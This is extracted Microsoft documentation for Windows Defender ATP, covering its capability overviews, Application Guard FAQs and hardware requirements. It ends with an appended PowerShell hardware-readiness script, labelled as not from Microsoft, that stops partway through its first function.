
Contents

Threat protection
Windows Defender Advanced Threat Protection
Overview
Attack surface reduction
Hardware-based isolation
Application isolation
System integrity
Application control
Exploit protection
Network protection
Controlled folder access
Attack surface reduction
Network firewall
Next generation protection
Endpoint detection and response
Security operations dashboard
Incidents queue
View and organize the Incidents queue
Manage incidents
Investigate incidents
Alerts queue
View and organize the Alerts queue
Manage alerts
Investigate alerts
Investigate files
Investigate machines
Investigate an IP address
Investigate a domain
Investigate a user account
Machines list
View and organize the Machines list
Manage machine group and tags
Alerts related to this machine
Machine timeline
Take response actions
Take response actions on a machine
Take response actions on a file
Automated investigation and remediation
Learn about the automated investigation and remediation dashboard
Secure score
Threat analytics
Advanced hunting
Query data using Advanced hunting
Advanced hunting reference
Advanced hunting query language best practices
Custom detections
Create custom detections rules
Management and APIs
Understand threat intelligence concepts
Windows Defender ATP APIs
Managed security service provider support
Microsoft threat protection
Protect users, data, and devices with conditional access
Microsoft Cloud App Security integration overview
Information protection in Windows overview
Microsoft Threat Experts
Portal overview
Get started
What's new in Windows Defender ATP
Minimum requirements
Validate licensing and complete setup
Preview features
Data storage and privacy
Assign user access to the portal
Evaluate Windows Defender ATP
Evaluate attack surface reduction
Hardware-based isolation
Application control
Exploit protection
Network Protection
Controlled folder access
Attack surface reduction
Network firewall
Evaluate next generation protection
Access the Windows Defender Security Center Community Center
Configure and manage capabilities
Configure attack surface reduction
Hardware-based isolation
System isolation
Application isolation
Application control
Device control
Control USB devices
Device Guard
Exploit protection
Import/export configurations
Network protection
Controlled folder access
Attack surface reduction controls
Customize attack surface reduction
Network firewall
Configure next generation protection
Utilize Microsoft cloud-delivered protection
Enable cloud-delivered protection
Specify the cloud-delivered protection level
Configure and validate network connections
Enable Block at first sight
Configure the cloud block timeout period
Configure behavioral, heuristic, and real-time protection
Detect and block Potentially Unwanted Applications
Enable and configure always-on protection and monitoring
Antivirus on Windows Server 2016
Antivirus compatibility
Use limited periodic antivirus scanning
Deploy, manage updates, and report on antivirus
Deploy and enable antivirus
Report on antivirus protection
Manage updates and apply baselines
Customize, initiate, and review the results of scans and remediation
Configure and validate exclusions in antivirus scans
Configure scanning antivirus options
Configure remediation for scans
Configure scheduled scans
Configure and run scans
Review scan results
Run and review the results of an offline scan
Restore quarantined files
Manage antivirus in your business
Use Group Policy settings to configure and manage antivirus
Use System Center Configuration Manager and Microsoft Intune to configure and manage antivirus
Use PowerShell cmdlets to configure and manage antivirus
Use Windows Management Instrumentation (WMI) to configure and manage antivirus
Use the mpcmdrun.exe command line tool to configure and manage antivirus
Manage scans and remediation
Configure and validate exclusions in antivirus scans
Configure scanning options
Configure remediation for scans
Configure scheduled scans
Configure and run scans
Review scan results
Run and review the results of an offline scan
Restore quarantined files
Manage next generation protection in your business
Use Microsoft Intune and System Center Configuration Manager to manage next generation protection
Use Group Policy settings to manage next generation protection
Use PowerShell cmdlets to manage next generation protection
Use Windows Management Instrumentation (WMI) to manage next generation protection
Use the mpcmdrun.exe command line tool to manage next generation protection
Configure Secure score dashboard security controls
Management and API support
Onboard machines
Onboard previous versions of Windows
Onboard Windows 10 machines
Onboard servers
Onboard non-Windows machines
Onboard machines without Internet access
Run a detection test on a newly onboarded machine
Run simulated attacks on machines
Configure proxy and Internet connectivity settings
Troubleshoot onboarding issues
Windows Defender ATP API
Get started with Windows Defender ATP APIs
APIs
How to use APIs - Samples
Windows updates (KB) info
Get KbInfo collection
Common Vulnerabilities and Exposures (CVE) to KB map
Get CVE-KB map
API for custom alerts
Enable the custom threat intelligence application
Use the threat intelligence API to create custom alerts
Create custom threat intelligence alerts
PowerShell code examples
Python code examples
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Pull alerts to your SIEM tools
Enable SIEM integration
Configure Splunk to pull alerts
Configure HP ArcSight to pull alerts
Windows Defender ATP SIEM alert API fields
Pull alerts using SIEM REST API
Troubleshoot SIEM tool integration issues
Reporting
Create and build Power BI reports using Windows Defender ATP data
Threat protection reports
Machine health and compliance reports
Interoperability
Partner applications
Role-based access control
Manage portal access using RBAC
Configure managed security service provider (MSSP) support
Configure and manage Microsoft Threat Experts capabilities
Configure Microsoft threat protection integration
Configure conditional access
Configure Microsoft Cloud App Security integration
Configure information protection in Windows
Configure Windows Defender Security Center settings
General
Update data retention settings
Configure alert notifications
Enable and create Power BI reports using Windows Defender Security center data
Enable Secure score security controls
Configure advanced features
Permissions
Use basic permissions to access the portal
Manage portal access using RBAC
APIs
Enable Threat intel
Enable SIEM integration
Rules
Manage suppression rules
Manage automation allowed/blocked lists
Manage indicators
Manage automation file uploads
Manage automation folder exclusions
Machine management
Onboarding machines
Offboarding machines
Configure Windows Defender Security Center time zone settings
Troubleshoot Windows Defender ATP
Troubleshoot sensor state
Check sensor state
Fix unhealthy sensors
Inactive machines
Misconfigured machines
Review sensor events and errors on machines with Event Viewer
Troubleshoot Windows Defender ATP service issues
Check service health
Troubleshoot attack surface reduction
Network protection
Attack surface reduction rules
Collect diagnostic data for files
Troubleshoot next generation protection
Security intelligence
Understand malware & other threats
Prevent malware infection
Malware names
Coin miners
Exploits and exploit kits
Fileless threats
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Industry antivirus tests
Industry collaboration programs
Virus information alliance
Microsoft virus initiative
Coordinated malware eradication
Information for developers
Software developer FAQ
Software developer resources
Windows Certifications
FIPS 140 Validations
Common Criteria Certifications
More Windows 10 security
The Windows Security app
Customize the Windows Security app for your organization
Hide Windows Security app notifications
Manage Windows Security app in Windows 10 in S mode
Virus and threat protection
Account protection
Firewall and network protection
App and browser control
Device security
Device performance and health
Family options
SmartScreen
SmartScreen Group Policy and mobile device management (MDM) settings
Set up and use SmartScreen on individual devices
Windows Defender Device Guard: virtualization-based security and WDAC
Control the health of Windows 10-based devices
Mitigate threats by using Windows 10 security features
Override Process Mitigation Options to help enforce app-related security policies
Use Windows Event Forwarding to help with intrusion detection
Block untrusted fonts in an enterprise
Security auditing
Basic security audit policies
Create a basic audit policy for an event category
Apply a basic audit policy on a file or folder
View the security event log
Basic security audit policy settings
Audit account logon events
Audit account management
Audit directory service access
Audit logon events
Audit object access
Audit policy change
Audit privilege use
Audit process tracking
Audit system events
Advanced security audit policies
Planning and deploying advanced security audit policies
Advanced security auditing FAQ
Which editions of Windows support advanced audit policy configuration
How to list XML elements in <EventData>
Using advanced security auditing options to monitor dynamic access control objects
Advanced security audit policy settings
Audit Kerberos Authentication Service
Audit Kerberos Service Ticket Operations
Audit Other Account Logon Events
Audit Application Group Management
Audit Computer Account Management
Audit Distribution Group Management
Audit Other Account Management Events
Audit Security Group Management
Audit User Account Management
Audit DPAPI Activity
Audit PNP Activity
Audit Process Creation
Audit Process Termination
Audit RPC Events
Audit Detailed Directory Service Replication
Audit Directory Service Access
Audit Directory Service Changes
Audit Directory Service Replication
Audit Account Lockout
Audit User/Device Claims
Audit Group Membership
Audit IPsec Extended Mode
Audit IPsec Main Mode
Audit IPsec Quick Mode
Audit Logoff
Audit Logon
Audit Network Policy Server
Audit Other Logon/Logoff Events
Audit Special Logon
Audit Application Generated
Audit Certification Services
Audit Detailed File Share
Audit File Share
Audit File System
Audit Filtering Platform Connection
Audit Filtering Platform Packet Drop
Audit Handle Manipulation
Audit Kernel Object
Audit Other Object Access Events
Audit Registry
Audit Removable Storage
Audit SAM
Audit Central Access Policy Staging
Audit Audit Policy Change
Audit Authentication Policy Change
Audit Authorization Policy Change
Audit Filtering Platform Policy Change
Audit MPSSVC Rule-Level Policy Change
Audit Other Policy Change Events
Audit Sensitive Privilege Use
Audit Non Sensitive Privilege Use
Audit Other Privilege Use Events
Audit IPsec Driver
Audit Other System Events
Audit Security State Change
Audit Security System Extension
Audit System Integrity
Other Events
Appendix A: Security monitoring recommendations for many audit events
Registry (Global Object Access Auditing)
File System (Global Object Access Auditing)
Security policy settings
Administer security policy settings
Network List Manager policies
Configure security policy settings
Security policy settings reference
Account Policies
Password Policy
Account Lockout Policy
Kerberos Policy
Audit Policy
Security Options
Accounts: Administrator account status
Accounts: Block Microsoft accounts
Accounts: Guest account status
Accounts: Limit local account use of blank passwords to console logon only
Accounts: Rename administrator account
Accounts: Rename guest account
Audit: Audit the access of global system objects
Audit: Audit the use of Backup and Restore privilege
Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings
Audit: Shut down system immediately if unable to log security audits
DCOM: Machine Access Restrictions in Security Descriptor Definition Language (SDDL) syntax
DCOM: Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) syntax
Devices: Allow undock without having to log on
Devices: Allowed to format and eject removable media
Devices: Prevent users from installing printer drivers
Devices: Restrict CD-ROM access to locally logged-on user only
Devices: Restrict floppy access to locally logged-on user only
Domain controller: Allow server operators to schedule tasks
Domain controller: LDAP server signing requirements
Domain controller: Refuse machine account password changes
Domain member: Digitally encrypt or sign secure channel data (always)
Domain member: Digitally encrypt secure channel data (when possible)
Domain member: Digitally sign secure channel data (when possible)
Domain member: Disable machine account password changes
Domain member: Maximum machine account password age
Domain member: Require strong (Windows 2000 or later) session key
Interactive logon: Display user information when the session is locked
Interactive logon: Don't display last signed-in
Interactive logon: Don't display username at sign-in
Interactive logon: Do not require CTRL+ALT+DEL
Interactive logon: Machine account lockout threshold
Interactive logon: Machine inactivity limit
Interactive logon: Message text for users attempting to log on
Interactive logon: Message title for users attempting to log on
Interactive logon: Number of previous logons to cache (in case domain controller is not available)
Interactive logon: Prompt user to change password before expiration
Interactive logon: Require Domain Controller authentication to unlock workstation
Interactive logon: Require smart card
Interactive logon: Smart card removal behavior
Microsoft network client: Digitally sign communications (always)
SMBv1 Microsoft network client: Digitally sign communications (always)
SMBv1 Microsoft network client: Digitally sign communications (if server agrees)
Microsoft network client: Send unencrypted password to third-party SMB servers
Microsoft network server: Amount of idle time required before suspending session
Microsoft network server: Attempt S4U2Self to obtain claim information
Microsoft network server: Digitally sign communications (always)
SMBv1 Microsoft network server: Digitally sign communications (always)
SMBv1 Microsoft network server: Digitally sign communications (if client agrees)
Microsoft network server: Disconnect clients when logon hours expire
Microsoft network server: Server SPN target name validation level
Network access: Allow anonymous SID/Name translation
Network access: Do not allow anonymous enumeration of SAM accounts
Network access: Do not allow anonymous enumeration of SAM accounts and shares
Network access: Do not allow storage of passwords and credentials for network authentication
Network access: Let Everyone permissions apply to anonymous users
Network access: Named Pipes that can be accessed anonymously
Network access: Remotely accessible registry paths
Network access: Remotely accessible registry paths and subpaths
Network access: Restrict anonymous access to Named Pipes and Shares
Network access: Restrict clients allowed to make remote calls to SAM
Network access: Shares that can be accessed anonymously
Network access: Sharing and security model for local accounts
Network security: Allow Local System to use computer identity for NTLM
Network security: Allow LocalSystem NULL session fallback
Network security: Allow PKU2U authentication requests to this computer to use online identities
Network security: Configure encryption types allowed for Kerberos Win7 only
Network security: Do not store LAN Manager hash value on next password change
Network security: Force logoff when logon hours expire
Network security: LAN Manager authentication level
Network security: LDAP client signing requirements
Network security: Minimum session security for NTLM SSP based (including secure RPC) clients
Network security: Minimum session security for NTLM SSP based (including secure RPC) servers
Network security: Restrict NTLM: Add remote server exceptions for NTLM authentication
Network security: Restrict NTLM: Add server exceptions in this domain
Network security: Restrict NTLM: Audit incoming NTLM traffic
Network security: Restrict NTLM: Audit NTLM authentication in this domain
Network security: Restrict NTLM: Incoming NTLM traffic
Network security: Restrict NTLM: NTLM authentication in this domain
Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
Recovery console: Allow automatic administrative logon
Recovery console: Allow floppy copy and access to all drives and folders
Shutdown: Allow system to be shut down without having to log on
Shutdown: Clear virtual memory pagefile
System cryptography: Force strong key protection for user keys stored on the computer
System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing
System objects: Require case insensitivity for non-Windows subsystems
System objects: Strengthen default permissions of internal system objects (e.g. Symbolic Links)
System settings: Optional subsystems
System settings: Use certificate rules on Windows executables for Software Restriction Policies
User Account Control: Admin Approval Mode for the Built-in Administrator account
User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode
User Account Control: Behavior of the elevation prompt for standard users
User Account Control: Detect application installations and prompt for elevation
User Account Control: Only elevate executables that are signed and validated
User Account Control: Only elevate UIAccess applications that are installed in secure locations
User Account Control: Run all administrators in Admin Approval Mode
User Account Control: Switch to the secure desktop when prompting for elevation
User Account Control: Virtualize file and registry write failures to per-user locations
Advanced security audit policy settings
User Rights Assignment
Access Credential Manager as a trusted caller
Access this computer from the network
Act as part of the operating system
Add workstations to domain
Adjust memory quotas for a process
Allow log on locally
Allow log on through Remote Desktop Services
Back up files and directories
Bypass traverse checking
Change the system time
Change the time zone
Create a pagefile
Create a token object
Create global objects
Create permanent shared objects
Create symbolic links
Debug programs
Deny access to this computer from the network
Deny log on as a batch job
Deny log on as a service
Deny log on locally
Deny log on through Remote Desktop Services
Enable computer and user accounts to be trusted for delegation
Force shutdown from a remote system
Generate security audits
Impersonate a client after authentication
Increase a process working set
Increase scheduling priority
Load and unload device drivers
Lock pages in memory
Log on as a batch job
Log on as a service
Manage auditing and security log
Modify an object label
Modify firmware environment values
Perform volume maintenance tasks
Profile single process
Profile system performance
Remove computer from docking station
Replace a process level token
Restore files and directories
Shut down the system
Synchronize directory service data
Take ownership of files or other objects
Windows security guidance for enterprises
Windows security baselines
Security Compliance Toolkit
Get support
Windows security configuration framework
Level 5 enterprise security
Level 4 enterprise high security
Level 3 enterprise VIP security
Level 2 enterprise dev/ops workstation
Level 1 enterprise administrator workstation
MBSA removal and alternatives
Windows 10 Mobile security guide
Change history for Threat protection
Threat Protection
4/30/2019 • 2 minutes to read

Windows Defender Advanced Threat Protection (Windows Defender ATP) is a unified platform for preventative
protection, post-breach detection, automated investigation, and response. Windows Defender ATP protects
endpoints from cyber threats, detects advanced attacks and data breaches, automates the handling of security
incidents, and improves security posture.

NOTE
The Windows Defender Security Center is currently going through rebranding. All references to Windows Defender will be
replaced with Microsoft Defender. You will see the updates in the user interface and in the documentation library in the
next few months.

[Diagram: Windows Defender ATP capability pillars: Threat & Vulnerability Management, Attack surface reduction,
Next generation protection, Endpoint detection and response, Automated investigation and remediation, Secure score,
Microsoft Threat Experts; underpinning all pillars: Management and APIs; Microsoft Threat Protection]

Threat & Vulnerability Management


This built-in capability uses a game-changing risk-based approach to the discovery, prioritization, and remediation
of endpoint vulnerabilities and misconfigurations.
Risk-based Threat & Vulnerability Management
What's in the dashboard and what it means for my organization
Configuration score
Scenarios
Attack surface reduction
The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring
configuration settings are properly set and exploit mitigation techniques are applied, this set of capabilities resists
attacks and exploitation.
Hardware-based isolation
Application control
Device control
Exploit protection
Network protection
Controlled folder access
Network firewall
Attack surface reduction controls
Next generation protection
To further reinforce the security perimeter of your network, Windows Defender ATP uses next generation
protection designed to catch all types of emerging threats.
Behavior monitoring
Cloud-based protection
Machine learning
URL Protection
Automated sandbox service
Endpoint detection and response
Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars.
Alerts
Historical endpoint data
Response orchestration
Forensic collection
Threat intelligence
Advanced detonation and analysis service
Advanced hunting
Custom detection
Realtime and historical hunting
Automated investigation and remediation
In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic
investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
Automated investigation and remediation
Threat remediation
Manage automated investigations
Analyze automated investigation
Secure score
Windows Defender ATP includes a secure score to help you dynamically assess the security state of your
enterprise network, identify unprotected systems, and take recommended actions to improve the overall security
of your organization.
Asset inventory
Recommended improvement actions
Secure score
Threat analytics
Microsoft Threat Experts
Windows Defender ATP's new managed threat hunting service provides proactive hunting, prioritization, and
additional context and insights that further empower Security Operations Centers (SOCs) to identify and respond
to threats quickly and accurately.
Targeted attack notification
Experts-on-demand
Configure your Microsoft Threat Experts managed hunting service
Management and APIs
Integrate Windows Defender Advanced Threat Protection into your existing workflows.
Onboarding
API and SIEM integration
Exposed APIs
Role-based access control (RBAC)
Reporting and trends
Microsoft Threat Protection
Windows Defender ATP is part of the Microsoft Threat Protection solution that helps implement end-to-end
security across possible attack surfaces in the modern workplace. Bring the power of Microsoft threat protection to
your organization.
Conditional access
O365 ATP
Azure ATP
Azure Security Center
Skype for Business
Microsoft Cloud App Security
Windows Defender Advanced Threat Protection
4/16/2019 • 3 minutes to read

Want to experience Windows Defender ATP? Sign up for a free trial.


For more info about Windows 10 Enterprise Edition features and functionality, see Windows 10 Enterprise
edition.

Windows Defender Advanced Threat Protection is a platform designed to help enterprise networks prevent,
detect, investigate, and respond to advanced threats.
Windows Defender ATP uses the following combination of technology built into Windows 10 and Microsoft's
robust cloud service:
Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral
signals from the operating system and send this sensor data to your private, isolated, cloud instance of
Windows Defender ATP.
Cloud security analytics: Leveraging big-data, machine-learning, and unique Microsoft optics across the
Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals
are translated into insights, detections, and recommended responses to advanced threats.
Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat
intelligence provided by partners, threat intelligence enables Windows Defender ATP to identify attacker
tools, techniques, and procedures, and generate alerts when these are observed in collected sensor data.

[Diagram: Windows Defender ATP capability pillars: Threat & Vulnerability Management, Attack surface reduction,
Next generation protection, Endpoint detection and response, Automated investigation and remediation, Secure score,
Microsoft Threat Experts; underpinning all pillars: Management and APIs; Microsoft Threat Protection]

TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

Threat & Vulnerability Management


This built-in capability uses a game-changing risk-based approach to the discovery, prioritization, and remediation
of endpoint vulnerabilities and misconfigurations.
Attack surface reduction
The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring
configuration settings are properly set and exploit mitigation techniques are applied, this set of capabilities resists
attacks and exploitation.
Next generation protection
To further reinforce the security perimeter of your network, Windows Defender ATP uses next generation
protection designed to catch all types of emerging threats.
Endpoint detection and response
Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced
threats that may have made it past the first two security pillars. You can also do advanced hunting to create
custom threat intelligence and use a powerful search and query tool to hunt for possible threats in your
organization.
Automated investigation and remediation
In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic
investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
Secure score
Windows Defender ATP includes a secure score to help you dynamically assess the security state of your
enterprise network, identify unprotected systems, and take recommended actions to improve the overall security
of your organization.
Microsoft Threat Experts
Windows Defender ATP's new managed threat hunting service provides proactive hunting, prioritization, and
additional context and insights that further empower Security Operations Centers (SOCs) to identify and respond to
threats quickly and accurately.
Management and APIs
Integrate Windows Defender Advanced Threat Protection into your existing workflows.
Microsoft Threat Protection
Windows Defender ATP is part of the Microsoft Threat Protection solution that helps implement end-to-end
security across possible attack surfaces in the modern workplace. Bring the power of Microsoft threat protection
to your organization.

In this section
To help you maximize the effectiveness of the security platform, you can configure individual capabilities that
surface in Windows Defender Security Center.

TOPIC | DESCRIPTION
Overview | Understand the concepts behind the capabilities in Windows Defender ATP so you take full advantage of the complete threat protection platform.
Get started | Learn about the requirements of the platform and the initial steps you need to take to get started with Windows Defender ATP.
Configure and manage capabilities | Configure and manage the individual capabilities in Windows Defender ATP.
Troubleshoot Windows Defender ATP | Learn how to address issues that you might encounter while using the platform.

Related topic
Windows Defender ATP helps detect sophisticated threats
Overview of Windows Defender ATP capabilities
4/30/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Understand the concepts behind the capabilities in Windows Defender ATP so you take full advantage of the
complete threat protection platform.

TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

In this section
TOPIC | DESCRIPTION
Threat & Vulnerability Management | Reduce organizational vulnerability exposure and increase threat resilience while seamlessly connecting workflows across security stakeholders—security administrators, security operations, and IT administrators in remediating threats.
Attack surface reduction | Leverage the attack surface reduction capabilities to protect the perimeter of your organization.
Next generation protection | Learn about the antivirus capabilities in Windows Defender ATP so you can protect desktops, portable computers, and servers.
Endpoint detection and response | Understand how Windows Defender ATP continuously monitors your organization for possible attacks against systems, networks, or users in your organization and the features you can use to mitigate and remediate threats.
Automated investigation and remediation | In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
Secure score | Quickly assess the security posture of your organization, see machines that require attention, as well as recommendations for actions to better protect your organization - all in one place.
Microsoft Threat Experts | Managed cybersecurity threat hunting service. Learn how you can get expert-driven insights and data through targeted attack notification and access to experts on demand.
Advanced hunting | Use a powerful search and query language to create custom queries and detection rules.
Management and APIs | Windows Defender ATP supports a wide variety of tools to help you manage and interact with the platform so that you can integrate the service into your existing workflows.
Microsoft Threat Protection | Microsoft security products work better together. Learn about other security capabilities in the Microsoft threat protection stack.
Portal overview | Learn to navigate your way around Windows Defender Security Center.
Overview of attack surface reduction
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Attack surface reduction capabilities in Windows Defender ATP help protect the devices and applications in your
organization from new and emerging threats.

CAPABILITY DESCRIPTION

Hardware-based isolation: Protects and maintains the integrity of the system as it starts and while it's running, and validates system integrity through local and remote attestation. In addition, container isolation for Microsoft Edge helps protect the host operating system from malicious websites.

Application control: Moves away from the traditional application trust model where all applications are assumed trustworthy by default to one where applications must earn trust in order to run.

Exploit protection: Applies exploit mitigation techniques to apps your organization uses, both individually and to all apps. Works with third-party antivirus solutions and Windows Defender Antivirus (Windows Defender AV).

Network protection: Extends the malware and social engineering protection offered by Windows Defender SmartScreen in Microsoft Edge to cover network traffic and connectivity on your organization's devices. Requires Windows Defender AV.

Controlled folder access: Helps protect files in key system folders from changes made by malicious and suspicious apps, including file-encrypting ransomware malware. Requires Windows Defender AV.

Attack surface reduction: Reduce the attack surface of your applications with intelligent rules that stop the vectors used by Office-, script- and mail-based malware. Requires Windows Defender AV.

Network firewall: Host-based, two-way network traffic filtering that blocks unauthorized network traffic flowing into or out of the local device.

Hardware-based isolation in Windows 10
4/5/2019 • 2 minutes to read • Edit Online

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
Hardware-based isolation helps protect system integrity in Windows 10 and is integrated with Windows Defender
ATP.

FEATURE DESCRIPTION

Windows Defender Application Guard: Application Guard protects your device from advanced attacks while keeping you productive. Using a unique hardware-based isolation approach, the goal is to isolate untrusted websites and PDF documents inside a lightweight container that is separated from the operating system via the native Windows Hypervisor. If an untrusted site or PDF document turns out to be malicious, it still remains contained within Application Guard's secure container, keeping the desktop PC protected and the attacker away from your enterprise data.

Windows Defender System Guard: System Guard protects and maintains the integrity of the system as it starts and after it's running, and validates system integrity by using attestation.

Windows Defender Application Guard overview
4/8/2019 • 4 minutes to read • Edit Online

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Application Guard (Application Guard) is designed to help prevent old and newly emerging
attacks to help keep employees productive. Using our unique hardware isolation approach, our goal is to destroy
the playbook that attackers use by making current attack methods obsolete.

What is Application Guard and how does it work?

Designed for Windows 10 and Microsoft Edge, Application Guard helps to isolate enterprise-defined untrusted
sites, protecting your company while your employees browse the Internet. As an enterprise administrator, you
define which web sites, cloud resources, and internal networks are trusted. Everything not on your list is
considered untrusted.
If an employee goes to an untrusted site through either Microsoft Edge or Internet Explorer, Microsoft Edge opens
the site in an isolated Hyper-V-enabled container, which is separate from the host operating system. This container
isolation means that if the untrusted site turns out to be malicious, the host PC is protected, and the attacker can't
get to your enterprise data. For example, this approach makes the isolated container anonymous, so an attacker
can't get to your employee's enterprise credentials.

What types of devices should use Application Guard?

Application Guard has been created to target several types of systems:
Enterprise desktops. These desktops are domain-joined and managed by your organization. Configuration management is primarily done through System Center Configuration Manager or Microsoft Intune. Employees typically have Standard User privileges and use a high-bandwidth, wired, corporate network.
Enterprise mobile laptops. These laptops are domain-joined and managed by your organization. Configuration management is primarily done through System Center Configuration Manager or Microsoft Intune. Employees typically have Standard User privileges and use a high-bandwidth, wireless, corporate network.
Bring your own device (BYOD) mobile laptops. These personally-owned laptops are not domain-joined, but are managed by your organization through tools like Microsoft Intune. The employee is typically an admin on the device and uses a high-bandwidth wireless corporate network while at work and a comparable personal network while at home.
Personal devices. These personally-owned desktops or mobile laptops are not domain-joined or managed by an organization. The user is an admin on the device and uses a high-bandwidth wireless personal network while at home or a comparable public network while outside.

Frequently Asked Questions

Q: Can I enable Application Guard on machines equipped with 4GB RAM?

A: We recommend 8GB RAM for optimal performance but you may use the following registry DWORD values to enable Application Guard on machines that aren't meeting the recommended hardware configuration.

HKLM\software\Microsoft\Hvsi\SpecRequiredProcessorCount - Default is 4 cores.

HKLM\software\Microsoft\Hvsi\SpecRequiredMemoryInGB - Default is 8GB.

HKLM\software\Microsoft\Hvsi\SpecRequiredFreeDiskSpaceInGB - Default is 5GB.

Q: Can employees download documents from the Application Guard Edge session onto host devices?

A: In Windows 10 Enterprise edition 1803, users will be able to download documents from the isolated Application Guard container to the host PC. This is managed by policy.

In Windows 10 Enterprise edition 1709 or Windows 10 Professional edition 1803, it is not possible to download files from the isolated Application Guard container to the host PC. However, employees can use the Print as PDF or Print as XPS options and save those files to the host device.

Q: Can employees copy and paste between the host device and the Application Guard Edge session?

A: Depending on your organization's settings, employees can copy and paste images (.bmp) and text to and from the isolated container.

Q: Why don't employees see their Favorites in the Application Guard Edge session?

A: To help keep the Application Guard Edge session secure and isolated from the host device, we don't copy the Favorites stored in the Application Guard Edge session back to the host device.

Q: Why aren't employees able to see their Extensions in the Application Guard Edge session?

A: Currently, the Application Guard Edge session doesn't support Extensions. However, we're closely monitoring your feedback about this.

Q: How do I configure WDAG to work with my network proxy (IP-Literal Addresses)?

A: WDAG requires proxies to have a symbolic name, not just an IP address. IP-Literal proxy settings such as “192.168.1.4:81” can be annotated as “itproxy:81” or using a record such as “P19216810010” for a proxy with an IP address of 192.168.100.10. This applies to Windows 10 Enterprise edition, 1709 or higher.

Q: I enabled the hardware acceleration policy on my Windows 10 Enterprise, version 1803 deployment. Why are my users still only getting CPU rendering?

A: This feature is currently experimental-only and is not functional without an additional regkey provided by Microsoft. If you would like to evaluate this feature on a deployment of Windows 10 Enterprise, version 1803, please contact Microsoft and we'll work with you to enable the feature.

Q: What is the WDAGUtilityAccount local account?

A: This account is part of Application Guard beginning with Windows 10 version 1709 (Fall Creators Update). This account remains disabled until Application Guard is enabled on your device. This item is integrated into the OS and is not considered a threat/virus/malware.

Related topics
TOPIC DESCRIPTION

System requirements for Windows Defender Application Guard: Specifies the pre-requisites necessary to install and use Application Guard.

Prepare and install Windows Defender Application Guard: Provides instructions about determining which mode to use, either Standalone or Enterprise-managed, and how to install Application Guard in your organization.

Configure the Group Policy settings for Windows Defender Application Guard: Provides info about the available Group Policy and MDM settings.

Testing scenarios using Windows Defender Application Guard: Provides a list of suggested testing scenarios that you can use to test Windows Defender Application Guard (Application Guard) in your business or organization.

System requirements for Windows Defender Application Guard
4/30/2019 • 2 minutes to read • Edit Online

Applies to: Windows Defender Advanced Threat Protection (Windows Defender ATP)
The threat landscape is continually evolving. While hackers are busy developing new techniques to breach
enterprise networks by compromising workstations, phishing schemes remain one of the top ways to lure
employees into social engineering attacks. Windows Defender Application Guard is designed to help prevent old
and newly emerging attacks, to help keep employees productive.

NOTE
Windows Defender Application Guard is not supported on VMs or in VDI environments. For testing and automation on
non-production machines, you may enable WDAG on a VM by enabling Hyper-V nested virtualization on the host.

Hardware requirements
Your environment needs the following hardware to run Windows Defender Application Guard.

HARDWARE DESCRIPTION

64-bit CPU: A 64-bit computer with minimum 4 cores (logical processors) is required for hypervisor and virtualization-based security (VBS). For more info about Hyper-V, see Hyper-V on Windows Server 2016 or Introduction to Hyper-V on Windows 10. For more info about hypervisor, see Hypervisor Specifications.

CPU virtualization extensions: Extended page tables, also called Second Level Address Translation (SLAT), AND one of the following virtualization extensions for VBS: VT-x (Intel) OR AMD-V.

Hardware memory: Microsoft requires a minimum of 8GB RAM

Hard disk: 5 GB free space, solid state disk (SSD) recommended

Input/Output Memory Management Unit (IOMMU) support: Not required, but strongly recommended
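The hardware requirements above and the Hvsi override values from the FAQ earlier on this page, as an added PowerShell example that is not part of the Microsoft documentation: it reads the logical processor count, memory, free disk space and SLAT/virtualization state through standard Win32_* CIM classes, and writes the three registry DWORDs only when an administrator opts in. The function names and the override values chosen are this example's own assumptions.

```powershell
# Added example (not from the Microsoft documentation): check a Windows 10 machine
# against the Application Guard hardware requirements listed above and, if an
# administrator chooses, write the Hvsi override DWORDs from the FAQ so that
# Application Guard can be enabled on a machine below the recommended spec.
# Assumptions: elevated PowerShell 5.1 on Windows 10 1709+; the CIM property
# names used below are the standard Win32_Processor/Win32_ComputerSystem ones.

function Get-WdagHardwareReadiness {
    [CmdletBinding()]
    param()

    $cpus = Get-CimInstance -ClassName Win32_Processor
    $cpu  = $cpus | Select-Object -First 1
    $cs   = Get-CimInstance -ClassName Win32_ComputerSystem
    $os   = Get-CimInstance -ClassName Win32_OperatingSystem
    $disk = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DeviceID='$($os.SystemDrive)'"

    # The requirement is 4 logical processors in total, so sum across sockets.
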